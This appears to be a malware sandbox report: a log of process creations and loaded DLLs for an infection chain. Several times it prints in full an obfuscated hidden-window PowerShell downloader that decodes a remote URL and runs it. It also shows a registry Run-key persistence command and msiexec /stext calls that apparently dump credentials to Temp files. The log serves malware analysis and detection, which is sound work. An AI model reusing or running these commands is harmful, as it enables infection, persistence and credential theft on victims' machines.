              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aH
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm I
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
